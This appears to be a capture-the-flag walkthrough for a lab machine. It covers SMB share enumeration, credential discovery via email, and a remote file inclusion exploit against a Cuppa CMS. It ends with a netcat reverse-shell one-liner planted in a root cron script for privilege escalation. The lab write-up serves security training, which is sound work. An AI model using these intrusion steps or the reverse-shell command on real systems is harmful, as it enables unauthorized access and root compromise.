Machine
Difficulty: Medium
Score: 5.5/10
Target
- 2 flags
- system privilege
Process
Enumeration
Scan ports using nmap
Lets use GoBuster to locate any directories!
SMB Service
SMBMap allows users to enumerate samba share drives across an entire domain. This program is available on all Kali Linux machines. If you don’t have the time or resources to set your own Kali Linux machine up, you can deploy your own and control it within your browser. Check it out.
The scan reveals a share called “anonymous” that has read access. Lets connect to the share and investigate.
smbclient //
Log1.txt contains possible passwords and there is a smb share called milesdyson. We have some potential credentials here… But SSH is disabled! What else can we do?
An earlier GoBuster scan revealed SquirrelMail!
Gasp! Reading his emails reveals a Samba password reset!
Lets log into Miles’ share and see what interesting things we can find! You should find a file that gives you information about a new CMS.
smbclient //<ip>/milesdyson
If you use GoBuster on the /45kra24zxs28v3yd/ directory, you will reveal an /administrator page. This reveals a Cuppa CMS!
Looking at the source code will give you an indication of the CMS’ version. After some online research, there is a public exploit for it! https://www.exploit-db.com/exploits/25971
Get a shell script and change the IP to be your tun0 IP (ifconfig), host it locally using Python, use netcat to listen for a session and then remotely include this shell on the webserver.
Privilege Escalation
So the file /home/milesdyson/backups/backup.sh is being called every minute. Inspecting this file:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.shThen open up a netcat session and you will receive a shell as root!